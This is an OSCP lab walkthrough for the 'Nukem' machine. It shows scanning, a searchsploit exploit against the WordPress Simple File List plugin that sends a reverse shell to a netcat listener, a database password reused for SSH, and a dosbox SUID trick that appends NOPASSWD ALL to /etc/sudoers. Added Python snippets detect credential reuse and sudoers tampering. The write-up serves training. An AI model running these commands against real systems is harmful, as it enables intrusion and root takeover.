静静

OSCP Official Lab: Nukem Writeup

Follow the 泷羽Sec / 泷羽Sec-静安 official account for regularly updated articles on OSCP, penetration testing and related topics, to help you keep up with the latest developments in security. Reply "OSCP配套工具" to the account to get the tools used in this post.

Start the lab machine from the official site

Information gathering

# Kali attacker address
192.168.45.159
# Target address
192.168.206.105

Port and directory scanning

# Set the MTU on the VPN interface
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# Scan all ports and collect the open ones into a comma-separated list
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.105 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# Service and vulnerability scripts against the open ports
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
# Directory brute force and web fingerprinting
gobuster dir -e -u http://192.168.206.105 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.236.105/

Scan results:

┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ echo $ports
22,80,3306

┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:28 EDT
Nmap scan report for 192.168.236.105
Host is up (0.32s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
|   256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
|_  256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
80/tcp   open  http    Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
3306/tcp open  mysql   MariaDB 10.3.24 or later (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|3.X|2.6.X (97%), MikroTik RouterOS 7.X (89%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (91%), Linux 3.2 - 4.14 (91%), Linux 2.6.32 - 3.10 (91%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (89%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.79 seconds

┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:36 EDT
Nmap scan report for 192.168.236.105
Host is up (0.41s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.105
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.236.105:80/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/author/admin/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/author/admin/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/student-registration/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/student-registration/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/sample-page/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/sample-page/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/2020/09/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/2020/09/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/instructor-registration/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/instructor-registration/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/category/uncategorized/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/index.php/category/uncategorized/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/wp-login.php
|     Form id: loginform
|     Form action: /wp-login.php
|
|     Path: http://192.168.236.105:80/index.php/dashboard/
|     Form id:
|     Form action: /
|
|     Path: http://192.168.236.105:80/?p=6
|     Form id:
|_    Form action: /
| http-fileupload-exploiter:
|
|     Couldn't find a file-type field.
|
|     Couldn't find a file-type field.
|
|_    Couldn't find a file-type field.'
| http-sql-injection:
|   Possible sqli for queries:
|_    http://192.168.236.105:80/wp-includes/js/plupload/moxie.min.js?ver=1.3.5%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.'
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 556.05 seconds

┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ whatweb http://192.168.236.105/
http://192.168.236.105/ [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], Email[admin@local.host], HTML5, HTTPServer[Unix][Apache/2.4.46 (Unix) PHP/7.4.10], IP[192.168.236.105], JQuery, MetaGenerator[TutorLMS 1.5.3,WordPress 5.5.1], PHP[7.4.10], Script[text/javascript], Title[Retro Gamming – Just another WordPress site], UncommonHeaders[link], WordPress[5.5.1], X-Powered-By[PHP/7.4.10]

===============================================================
http://192.168.206.105/index.php            (Status: 301) [Size: 0] [--> http://192.168.206.105/]
http://192.168.206.105/wp-content           (Status: 301) [Size: 242] [--> http://192.168.206.105/wp-content/]
http://192.168.206.105/wp-login.php         (Status: 200) [Size: 6193]
http://192.168.206.105/wordpress            (Status: 301) [Size: 241] [--> http://192.168.206.105/wordpress/]
http://192.168.206.105/license.txt          (Status: 200) [Size: 19915]
http://192.168.206.105/wp-includes          (Status: 301) [Size: 243] [--> http://192.168.206.105/wp-includes/]
http://192.168.206.105/readme.html          (Status: 200) [Size: 7278]
http://192.168.206.105/wp-trackback.php     (Status: 200) [Size: 135]
http://192.168.206.105/wp-admin             (Status: 301) [Size: 240] [--> http://192.168.206.105/wp-admin/]
http://192.168.206.105/xmlrpc.php           (Status: 405) [Size: 42]
^C
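As an added example (not from the original post), the port-extraction pipeline above rewritten in Python over nmap's grepable (-oG) output: it keeps ports per host, can also list `filtered` ports, which are worth re-checking at a lower scan rate (that is how port 5000 surfaced in this lab), and builds the comma-separated list for `-p`. The sample output and function names are constructed.

```python
import re
from typing import Dict, List, Sequence

# Constructed sample of nmap grepable output (-oG); not the scan from this post.
SAMPLE_GNMAP = (
    "# Nmap 7.95 scan initiated (constructed sample)\n"
    "Host: 192.168.206.105 ()\tStatus: Up\n"
    "Host: 192.168.206.105 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "3306/open/tcp//mysql///, 5000/filtered/tcp//upnp///\tIgnored State: closed (65531)\n"
    "# Nmap done -- 1 IP address (1 host up)\n"
)

# One -oG port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def ports_by_host(gnmap_text: str, states: Sequence[str] = ("open",)) -> Dict[str, List[int]]:
    """Map each host to its ports whose state is in `states`, in scan order."""
    result: Dict[str, List[int]] = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The port list ends at the tab-separated "Ignored State" field, if present
        ports_field = line.split("Ports:", 1)[1].split("\tIgnored", 1)[0]
        for port, state, _proto, _owner, _svc, _rpc, _ver in PORT_RE.findall(ports_field):
            if state in states:
                result.setdefault(host, []).append(int(port))
    return result


def ports_arg(ports: Sequence[int]) -> str:
    """Comma-separated, de-duplicated, sorted list suitable for nmap's -p."""
    return ",".join(str(p) for p in sorted(set(ports)))


if __name__ == "__main__":
    for host, ports in ports_by_host(SAMPLE_GNMAP, ("open", "filtered")).items():
        print(host, ports_arg(ports))
```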

The familiar WordPress; find the login entry point.

# Simple version
wpscan --update --url  http://192.168.206.105 -e u

# Full version with aggressive plugin detection
# Enumerate plugins, themes and users (replace the placeholder with your own WPScan API token)
wpscan --enumerate ap,t,u --api-token <YOUR_WPSCAN_API_TOKEN> --plugins-detection aggressive  --url http://192.168.206.105
# Password brute force: very slow, keep it as a last resort
wpscan --usernames admin --passwords /usr/share/wordlists/rockyou.txt  --url http://192.168.206.105

WordPress plugin vulnerability

Although we did not obtain the login password, the scan shows that the Simple File List plugin is vulnerable, so search for exploitation methods for the Simple File List plugin.

searchsploit simple file list
searchsploit -m php/webapps/48979.py

Change the IP to Kali's, and change the port to one the target already had open; 5000 is used here. It did not show up in the initial scan, but with a lower scan rate port 5000 does appear.

rlwrap nc -lvnp 5000
python 48979.py http://192.168.206.105

Internal information gathering

Read the configuration file to get the database password

cat wp-config.php

[!success] Database password: commander CommanderKeenVorticons1990

Reuse the database password directly as the user's password and switch user; logging in over SSH instead of using the current shell also works.

su commander
python3 -c 'import pty;pty.spawn("/bin/bash")'
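An added defender-side check (not code from the original post) for the credential-reuse condition just exploited: it parses the DB_* constants out of wp-config.php, flags a DB user name that is also a login-capable system account, a config file readable by group or others, and a database on the same host as the web server. The sample files and function names are constructed.

```python
import re
from typing import Dict, List, Set

# Constructed samples (not the lab's real files): a wp-config.php fragment and an
# /etc/passwd excerpt. The DB user name matches a login-capable system account,
# which is exactly the condition that let a leaked DB password become a shell.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'commander' );
define( 'DB_PASSWORD', 'constructed-sample-password' );
define( 'DB_HOST', 'localhost' );
"""
SAMPLE_PASSWD = """root:x:0:0::/root:/bin/bash
http:x:33:33::/srv/http:/usr/bin/nologin
commander:x:1000:1000::/home/commander:/bin/bash
"""

DEFINE_RE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_wp_defines(text: str) -> Dict[str, str]:
    """Extract the DB_* constants from wp-config.php."""
    return dict(DEFINE_RE.findall(text))


def login_capable_users(passwd_text: str) -> Set[str]:
    """Accounts whose login shell is not a nologin/false stub."""
    users = set()
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and not fields[6].endswith(("nologin", "false")):
            users.add(fields[0])
    return users


def credential_reuse_findings(wp_config: str, passwd: str, config_mode: int) -> List[str]:
    """Conditions under which a readable wp-config.php escalates to a user shell.
    config_mode is the file's permission bits (e.g. os.stat(path).st_mode & 0o777)."""
    cfg = parse_wp_defines(wp_config)
    findings = []
    db_user = cfg.get("DB_USER", "")
    # A shared account name is a strong hint that the password is shared too
    if db_user in login_capable_users(passwd):
        findings.append(f"DB_USER '{db_user}' is also a login-capable system account")
    if config_mode & 0o044:
        findings.append("wp-config.php is readable by group or others")
    if cfg.get("DB_HOST", "") in ("localhost", "127.0.0.1"):
        findings.append("database runs on the web host; a web shell reaches it directly")
    return findings
```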

Got the first flag. Nothing more of use turned up in the database.

scp linpeas.sh commander@192.168.206.105:/tmp/linpeas.sh

Upload linpeas to enumerate; it finds that /usr/bin/dosbox can be used for privilege escalation. Looking up the escalation commands at https://gtfobins.github.io/gtfobins/dosbox/ shows it can write files with elevated privileges, so appending a line that gives commander full sudo is enough.

LFILE='/etc/sudoers'
/usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit
sudo -s
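An added detection example (not code from the original post) for the sudoers tampering above: it parses user specifications out of sudoers content, flags any principal outside a baseline that may run ALL commands (with or without a password), and diffs the file against a known-good copy to surface appended lines. The sample content, baseline and function names are constructed; real sudoers files also use aliases and include directives, which are skipped rather than parsed.

```python
import re
from typing import List, Tuple

# Constructed sudoers content (not the lab's file): a sane baseline plus the
# kind of line the SUID dosbox write appends.
SAMPLE_SUDOERS = """## sudoers file.
Defaults env_reset
root ALL=(ALL) ALL
%wheel ALL=(ALL) ALL
alice ALL=(root) /usr/bin/systemctl restart httpd
commander ALL=(ALL) NOPASSWD: ALL
"""

# who  hosts = (runas) commands   (tags such as NOPASSWD: stay in the commands part)
USER_SPEC_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias",
                 "#include", "#includedir", "@include", "@includedir")


def parse_user_specs(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (who, hosts, runas, commands) for each user specification line."""
    specs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        line = line.split("#", 1)[0].strip()  # drop plain comments ('## ...')
        m = USER_SPEC_RE.match(line) if line else None
        if m:
            who, hosts, runas, cmds = m.groups()
            specs.append((who, hosts, runas or who, cmds.strip()))
    return specs


def risky_grants(text: str, baseline=("root", "%wheel", "%sudo")) -> List[str]:
    """Flag principals outside the baseline that may run ALL commands."""
    findings = []
    for who, _hosts, runas, cmds in parse_user_specs(text):
        if who not in baseline and cmds.replace("NOPASSWD:", "").strip() == "ALL":
            suffix = " without a password" if "NOPASSWD:" in cmds else ""
            findings.append(f"{who} may run ALL commands as ({runas}){suffix}")
    return findings


def appended_lines(known_good: str, current: str) -> List[str]:
    """Lines present in the current file but absent from the known-good copy."""
    known = set(known_good.splitlines())
    return [line for line in current.splitlines() if line not in known]
```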

Got the second flag.

Summary

Intrusion path diagram

flowchart TD
    %% Assets
    A[Kali attacker <br> 192.168.45.159]
    B[Target <br> 192.168.206.105]
    C[http user shell]
    D[commander account password]
    E[root]

    %% Path
    A-->|scan|B
    B-->|plugin vulnerability|C
    C-->|database password leak|D
    D-->|dosbox privilege escalation|E

    %% Line types: ---(solid), -.->(dashed), ==>(thick arrow)
    %% -->|yes|: edge with label text
    %% rectangle node [ ], diamond decision node { }, rounded node ( )
    %% Style definitions
    classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
    classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
    classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
    %% Line style and colours (light and dark themes)
    linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;

    %% Apply styles
    class A attack;
    class B,C public;
    class D,E internal;

Intrusion timeline

gantt
    title Attack timeline
    dateFormat  YYYY-MM-DD HH:mm
    axisFormat  %H:%M

    section Reconnaissance
    Target scanning              :a1, 2025-08-20 14:25, 2025-08-20 15:25
    Vulnerability identification :a2, after a1, 2025-08-20 16:40

    section Attack
    Initial access               :b1, after a2, 2025-08-20 17:12
    Privilege escalation         :crit, b2, 2025-08-22 15:05, 15m

    section Post-exploitation
    Data theft                   :c1, after b2, 5m


Penetration testing OSCP